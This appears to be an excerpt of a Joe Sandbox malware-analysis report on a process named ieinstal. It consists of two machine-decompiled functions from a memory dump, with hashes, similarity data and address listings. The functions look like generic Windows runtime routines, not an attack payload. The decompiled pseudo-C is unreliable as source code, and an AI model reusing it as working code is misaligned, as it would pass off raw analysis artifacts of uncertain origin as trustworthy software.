                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 675aeae35502d4fecb4e2f34e4bf5617d8aa5dd80eaad6f8c8313a44e6e7b6d2
                                                            • Instruction ID: 74eae6707fc55d295d97e423e1b113de4c3c6a17fc366ec2d7a9539d7b8e60ee
                                                            • Opcode Fuzzy Hash: 675aeae35502d4fecb4e2f34e4bf5617d8aa5dd80eaad6f8c8313a44e6e7b6d2
                                                            • Instruction Fuzzy Hash: AFE1C275A0039ACFDB209F15CDD0B6ABBB2BF49314F010799D9099B794DB34A981CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6849B Relevance: .3, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E1EC6849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x1ed2f9c0);
				E1ECAD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1ed47b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E1EC6CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E1EC72280( *[fs:0x30], 0x1ed48550);
						_t139 =  *0x1ed47b04; // 0x8
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E1EC8F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E1EC6FFB0(_t193, _t235, 0x1ed48550);
								L5:
								return E1ECAD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E1EC51C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1ed47b9c; // 0x0
							_t235 = L1EC74620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1ed47b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E1EC8A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E1EC6FFB0(_t193, _t235, 0x1ed48550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L1EC777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L1EC777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1ed47b04; // 0x8
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1ed47b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E1EC937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1ed47b9c; // 0x0
									_t214 = L1EC74620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E1EC937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1ed47b10 =  *0x1ed47b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1ed47b04 =  *0x1ed47b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L1EC777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L1EC777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1ed47b08 =  *0x1ed47b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E1EC957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E1EC9F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L1EC777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E1EC8A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L1EC777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E1EC996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                            0x1ec6849b
                                                            0x1ec6849b
                                                            0x1ec6849b
                                                            0x1ec6849b
                                                            0x1ec6849d
                                                            0x1ec684a2
                                                            0x1ec684a7
                                                            0x1ec684b1
                                                            0x1ec684d8
                                                            0x00000000
                                                            0x1ec684b3
                                                            0x1ec684c4
                                                            0x1ec684c9
                                                            0x1ec684cd
                                                            0x1ec684cf
                                                            0x1ec684cf
                                                            0x1ec684d6
                                                            0x1ec684e6
                                                            0x1ec684e9
                                                            0x1ec684ec
                                                            0x1ec684ef
                                                            0x1ec684f2
                                                            0x1ec684f4
                                                            0x1ec684fc
                                                            0x1ec68501
                                                            0x1ec68506
                                                            0x1ec68509
                                                            0x1ec686e0
                                                            0x1ec686e5
                                                            0x1ec686e8
                                                            0x1ec686ed
                                                            0x1ec686f0
                                                            0x1ec686f2
                                                            0x1ecb9afd
                                                            0x1ecb9b02
                                                            0x1ec684da
                                                            0x1ec684df
                                                            0x1ec684df
                                                            0x1ec686fa
                                                            0x1ec686fd
                                                            0x1ec686fe
                                                            0x1ec68701
                                                            0x1ec68706
                                                            0x1ec68709
                                                            0x1ec6870b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec68711
                                                            0x1ec68725
                                                            0x1ec68727
                                                            0x1ec6872a
                                                            0x1ec6872c
                                                            0x1ecb9af0
                                                            0x1ecb9af5
                                                            0x1ec68732
                                                            0x1ec68732
                                                            0x1ec68732
                                                            0x1ec68735
                                                            0x1ec68737
                                                            0x1ec68515
                                                            0x1ec68515
                                                            0x1ec68518
                                                            0x1ec6851d
                                                            0x1ec68523
                                                            0x1ec68527
                                                            0x1ec6852b
                                                            0x1ec68537
                                                            0x1ec68539
                                                            0x1ec6853c
                                                            0x1ec6853e
                                                            0x1ec6868c
                                                            0x1ec68691
                                                            0x1ec68699
                                                            0x1ec6869b
                                                            0x1ec68744
                                                            0x1ec68748
                                                            0x1ec686a1
                                                            0x1ec686a1
                                                            0x1ec686a1
                                                            0x1ec686a4
                                                            0x1ec686a8
                                                            0x1ecb9bdf
                                                            0x1ecb9bdf
                                                            0x1ec686ae
                                                            0x1ec686b0
                                                            0x00000000
                                                            0x1ec686b6
                                                            0x00000000
                                                            0x1ecb9be9
                                                            0x1ec686b0
                                                            0x1ec68544
                                                            0x1ec6854a
                                                            0x1ec6854d
                                                            0x1ec68551
                                                            0x1ec6876e
                                                            0x1ec68778
                                                            0x1ec6877b
                                                            0x1ec68780
                                                            0x1ec68557
                                                            0x1ec68557
                                                            0x1ec6855d
                                                            0x1ec6855d
                                                            0x1ec6856b
                                                            0x1ec6856e
                                                            0x1ec68570
                                                            0x1ec68573
                                                            0x1ec68576
                                                            0x1ec68576
                                                            0x1ec68579
                                                            0x1ec6857b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec68581
                                                            0x1ec685a0
                                                            0x1ec685a2
                                                            0x1ec685a5
                                                            0x1ec685a7
                                                            0x1ecb9b1b
                                                            0x1ecb9b1b
                                                            0x1ec6862e
                                                            0x1ec6862e
                                                            0x1ec68631
                                                            0x1ec68631
                                                            0x1ec68634
                                                            0x1ec68636
                                                            0x1ec68669
                                                            0x1ec68669
                                                            0x1ec6866b
                                                            0x1ecb9bbf
                                                            0x1ecb9bc4
                                                            0x1ecb9bc8
                                                            0x1ecb9bce
                                                            0x1ecb9bce
                                                            0x1ec68671
                                                            0x1ec68671
                                                            0x1ec68674
                                                            0x1ec68676
                                                            0x1ecb9bae
                                                            0x1ecb9bae
                                                            0x1ec68676
                                                            0x1ec6867c
                                                            0x1ec6867e
                                                            0x1ec68688
                                                            0x1ec68688
                                                            0x00000000
                                                            0x1ec6867e
                                                            0x1ec68638
                                                            0x1ec68638
                                                            0x1ec6863b
                                                            0x1ec6863e
                                                            0x1ec6863f
                                                            0x1ec68642
                                                            0x1ec68645
                                                            0x1ec68648
                                                            0x1ec6864d
                                                            0x1ecb9b69
                                                            0x1ecb9b6e
                                                            0x1ecb9b7b
                                                            0x1ecb9b81
                                                            0x1ecb9b85
                                                            0x1ecb9b89
                                                            0x1ecb9ba7
                                                            0x1ecb9b8b
                                                            0x1ecb9b91
                                                            0x1ecb9b9a
                                                            0x1ecb9b9f
                                                            0x1ecb9b9f
                                                            0x1ec68788
                                                            0x1ec6878d
                                                            0x1ec68763
                                                            0x1ec68763
                                                            0x1ec68766
                                                            0x00000000
                                                            0x1ec68766
                                                            0x1ecb9b70
                                                            0x00000000
                                                            0x1ecb9b70
                                                            0x1ec68656
                                                            0x1ec6865a
                                                            0x1ec6865c
                                                            0x1ec68752
                                                            0x1ec68756
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6875e
                                                            0x00000000
                                                            0x1ec6875e
                                                            0x1ec68662
                                                            0x1ec68662
                                                            0x1ec68662
                                                            0x1ec68666
                                                            0x00000000
                                                            0x1ec68666
                                                            0x1ec685b7
                                                            0x1ec685b9
                                                            0x1ec685bc
                                                            0x1ec685bf
                                                            0x1ec685cc
                                                            0x1ec685d1
                                                            0x1ec685d4
                                                            0x1ec685db
                                                            0x1ec685de
                                                            0x1ec685e0
                                                            0x1ecb9b5f
                                                            0x00000000
                                                            0x1ecb9b5f
                                                            0x1ec685e6
                                                            0x1ec685ea
                                                            0x1ec686c3
                                                            0x1ec686c5
                                                            0x1ec686c8
                                                            0x1ec686ca
                                                            0x1ecb9b16
                                                            0x00000000
                                                            0x1ecb9b16
                                                            0x1ec686d6
                                                            0x1ec685f6
                                                            0x1ec685f6
                                                            0x1ec685f9
                                                            0x1ec68602
                                                            0x1ec68606
                                                            0x1ec6860a
                                                            0x1ec6860b
                                                            0x1ec6860e
                                                            0x1ec68611
                                                            0x00000000
                                                            0x1ec68611
                                                            0x1ec685f3
                                                            0x00000000
                                                            0x1ec685f3
                                                            0x1ec68619
                                                            0x1ec6861e
                                                            0x1ec6861e
                                                            0x1ec68621
                                                            0x1ec68622
                                                            0x1ec68623
                                                            0x1ec68625
                                                            0x1ec6862c
                                                            0x00000000
                                                            0x1ec6873d
                                                            0x00000000
                                                            0x1ec6873d
                                                            0x1ec68737
                                                            0x1ec6850f
                                                            0x1ec68512
                                                            0x00000000
                                                            0x1ec68512
                                                            0x00000000
                                                            0x1ec684d6

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8123c3cdda82076dedda2f665c69cc6ed521f2c94cdeac5d49c23e5c1930f4c6
                                                            • Instruction ID: 1e7e910909c9621b309b77bc65a9dc26a294d594a6229ea22d4c8b0607686bcd
                                                            • Opcode Fuzzy Hash: 8123c3cdda82076dedda2f665c69cc6ed521f2c94cdeac5d49c23e5c1930f4c6
                                                            • Instruction Fuzzy Hash: 79B15BB6E00299DFDB14CFA9CDD0A9EFBB6BF48304F10462AE505AB345DB70A945CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8513A Relevance: .3, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E1EC8513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1ed4d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E1EC9D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E1EC72280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L1EC74620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E1EC9F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E1EC6FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x1ed4b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E1EC9B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                            0x1ec85142
                                                            0x1ec8514c
                                                            0x1ec85150
                                                            0x1ec85157
                                                            0x1ec85159
                                                            0x1ec8515e
                                                            0x1ec85165
                                                            0x1ec85169
                                                            0x1ec8516c
                                                            0x1ec85172
                                                            0x1ec85176
                                                            0x1ec8517a
                                                            0x1ec8517a
                                                            0x1ec8517a
                                                            0x1ec8517f
                                                            0x1ecc6d8b
                                                            0x1ecc6d8e
                                                            0x1ecc6d91
                                                            0x1ecc6d95
                                                            0x1ecc6d98
                                                            0x1ecc6d9c
                                                            0x1ecc6da0
                                                            0x1ecc6da3
                                                            0x1ecc6da7
                                                            0x1ecc6e26
                                                            0x1ecc6e26
                                                            0x1ecc6e2a
                                                            0x1ec851f9
                                                            0x1ec851f9
                                                            0x1ec851fe
                                                            0x1ecc6e33
                                                            0x1ecc6e33
                                                            0x1ecc6e39
                                                            0x1ecc6e3d
                                                            0x1ecc6e46
                                                            0x1ecc6e50
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6e52
                                                            0x1ecc6e53
                                                            0x1ecc6e56
                                                            0x1ecc6e5d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6e5f
                                                            0x1ecc6e67
                                                            0x1ecc6e77
                                                            0x1ecc6e7f
                                                            0x1ecc6e80
                                                            0x1ecc6e88
                                                            0x1ecc6e90
                                                            0x1ecc6e9f
                                                            0x1ecc6ea5
                                                            0x1ecc6ea9
                                                            0x1ecc6eb1
                                                            0x1ecc6ebf
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6ecf
                                                            0x1ecc6ed3
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6edb
                                                            0x1ecc6ede
                                                            0x1ecc6ee1
                                                            0x1ecc6ee8
                                                            0x1ecc6eeb
                                                            0x1ecc6eed
                                                            0x1ecc6ef0
                                                            0x1ecc6ef4
                                                            0x1ecc6ef8
                                                            0x1ecc6efc
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6f0d
                                                            0x1ecc6f11
                                                            0x1ecc6f32
                                                            0x1ecc6f37
                                                            0x1ecc6f3b
                                                            0x1ecc6f3e
                                                            0x1ecc6f41
                                                            0x1ecc6f46
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6f4c
                                                            0x1ecc6f50
                                                            0x1ecc6f50
                                                            0x1ecc6f54
                                                            0x1ecc6f62
                                                            0x1ecc6f65
                                                            0x1ecc6f6d
                                                            0x1ecc6f7b
                                                            0x1ecc6f7b
                                                            0x1ecc6f93
                                                            0x1ecc6f98
                                                            0x1ecc6fa0
                                                            0x1ecc6fa6
                                                            0x1ecc6fb3
                                                            0x1ecc6fb6
                                                            0x1ecc6fbf
                                                            0x1ecc6fc1
                                                            0x1ecc6fd5
                                                            0x1ecc6fda
                                                            0x1ecc6fda
                                                            0x1ecc6fdd
                                                            0x1ecc6fe2
                                                            0x1ecc6fe7
                                                            0x1ecc6feb
                                                            0x1ecc6fef
                                                            0x1ecc6ff3
                                                            0x1ec8520c
                                                            0x1ec8520c
                                                            0x1ec8520f
                                                            0x1ec85215
                                                            0x1ec85234
                                                            0x1ec8523a
                                                            0x1ec8523a
                                                            0x1ec85244
                                                            0x1ec85245
                                                            0x1ec85246
                                                            0x1ec85251
                                                            0x1ec85251
                                                            0x1ecc6f13
                                                            0x1ecc6f17
                                                            0x1ecc6f17
                                                            0x1ecc6f18
                                                            0x1ecc6f1b
                                                            0x1ecc6f1f
                                                            0x1ecc6f23
                                                            0x00000000
                                                            0x1ecc6f28
                                                            0x1ec85204
                                                            0x1ec85204
                                                            0x1ec85208
                                                            0x00000000
                                                            0x1ec85208
                                                            0x1ec85185
                                                            0x1ec85188
                                                            0x1ec8518a
                                                            0x1ec8518e
                                                            0x1ec85195
                                                            0x1ecc6db1
                                                            0x1ecc6db5
                                                            0x1ecc6db9
                                                            0x1ec8519b
                                                            0x1ec8519b
                                                            0x1ec8519e
                                                            0x1ec851a7
                                                            0x1ec851a9
                                                            0x1ec851a9
                                                            0x1ec851b5
                                                            0x1ec851b8
                                                            0x1ec851bb
                                                            0x1ec851be
                                                            0x1ec851c1
                                                            0x1ec851c5
                                                            0x1ec851c9
                                                            0x1ec851cd
                                                            0x1ec851cd
                                                            0x1ec851d8
                                                            0x1ec851dc
                                                            0x1ec851e0
                                                            0x1ecc6dcc
                                                            0x1ecc6dd0
                                                            0x1ecc6dd5
                                                            0x1ecc6ddd
                                                            0x1ecc6de1
                                                            0x1ecc6de1
                                                            0x1ecc6de5
                                                            0x1ecc6deb
                                                            0x1ecc6df1
                                                            0x1ecc6df7
                                                            0x1ecc6dfd
                                                            0x1ecc6e01
